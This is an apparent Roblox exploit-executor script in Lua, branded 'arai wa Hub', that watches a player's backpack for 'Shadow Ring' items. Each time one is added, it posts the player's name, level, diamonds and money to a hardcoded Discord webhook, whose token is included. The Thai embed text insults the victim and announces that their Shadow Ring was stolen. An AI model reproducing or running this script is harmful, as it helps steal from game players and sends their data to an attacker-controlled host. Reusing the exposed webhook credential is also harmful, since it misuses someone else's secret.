_G.Webhook = "https://discord.com/api/webhooks/1317403529991815239/JKmCCr2BtugjCpgh5wlAnu1QEZJJK5M80sA-SOPkz-pg_dM5UtHJuQGUh8BdD5JafUdz"
do
	players = game.Players
	localplayer = players.LocalPlayer
	Char = localplayer.Character
	Root = Char:WaitForChild("HumanoidRootPart")
	Humanoid = Char:WaitForChild("Humanoid")
	MouseCheckReq = localplayer:GetMouse()
	temppcall = pcall
	ReplicatedStorage = game:GetService("ReplicatedStorage")
	HttpService = game:GetService("HttpService")
	_env = getgenv and getgenv() or {}
	VirtualUser = game:GetService("VirtualUser")
    request = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
end
-------- \\ Webhook Function // --------
function sendwebhook(url, data)
    local success, encodedData = pcall(function()
        return HttpService:JSONEncode(data)
    end)
    if not success then
        warn("Failed to encode data:", encodedData)
        return false
    end
    
    local headers = {
        ["Content-Type"] = "application/json"
    }
    
    if not request then
        warn("No HTTP request function available.")
        return false
    end
    
    local success, response = pcall(function()
        return request({
            Url = url,
            Method = "POST",
            Headers = headers,
            Body = encodedData
        })
    end)
    if not success then
        warn("Failed to send webhook:", response)
    end
    return success
end

-------- \\ Player Profile Function // --------
getplayerprofile = function()
    local response = game:HttpGet("https://thumbnails.roblox.com/v1/users/avatar-bust?userIds=" .. localplayer.UserId .. "&size=420x420&format=Png&isCircular=false")
    local decodedResponse = HttpService:JSONDecode(response)
    return decodedResponse['data'][1]['imageUrl']
end
-------- \\ Webhook Sending Loop // --------
local lastItemCount = 0
spawn(function()
    while task.wait(0.2) do
        xpcall(function()
            if not localplayer.Backpack then return end
            local money = tostring(localplayer.PlayerGui.HUD.Display.Beli.Text)
            local level = tostring(localplayer.PlayerGui.HUD.Display.Level.Text)
            local diamond = tostring(localplayer.PlayerGui.HUD.Display.Diamond.Text)
            local currentCount = 0
            for _, item in pairs(localplayer.Backpack:GetChildren()) do
                if item:IsA("Tool") and item.Name == "Shadow Ring" then
                    currentCount += 1
                end
            end
            if currentCount > lastItemCount then
                local addedCount = currentCount - lastItemCount
                if _G.Webhook and _G.Webhook ~= "" then
                    local data = {
                        ["username"] = "แจ้งเตือนคนปัญญาอ่อน",
                        ["embeds"] = {{
                            ["title"] = localplayer.Name .. " | Player Stats",
                            ["color"] = 16711782,
                            ["fields"] = {
                                {
                                    ["name"] = "📊 Level",
                                    ["value"] = "```" .. level .. "```",
                                    ["inline"] = true
                                },
                                {
                                    ["name"] = "💎 Diamond",
                                    ["value"] = "```" .. diamond .. "```",
                                    ["inline"] = true
                                },
                                {
                                    ["name"] = "ตังทับพ่อมึง",
                                    ["value"] = "```" .. money .. "```",
                                    ["inline"] = true
                                },
                                {
                                    ["name"] = "📦 Item Inventory",
                                    ["value"] = "```" .. "มึงโดนกูขโมยShadow Ringขอบคุณ" .. "```",
                                    ["inline"] = false
                                }
                            },
                            ["footer"] = {
                                ["text"] = "arai wa Hub",
                                ["icon_url"] = "https://media.discordapp.net/attachments/797998461735403551/1317526814297554997/miw.png?ex=675f01f6&is=675db076&hm=a3bc28b54780c8657bf8d5b2f5c2ec292126f7e6c2b459e9be314fa71756f15b&=&format=webp&quality=lossless"
                            }
                        }}
                    }
                    sendwebhook(_G.Webhook, data)
                    print("Webhook sent: Shadow Ring added!")
                else
                    warn("Webhook URL is not set or empty.")
                end
            end
            lastItemCount = currentCount
        end,print)
    end
end)
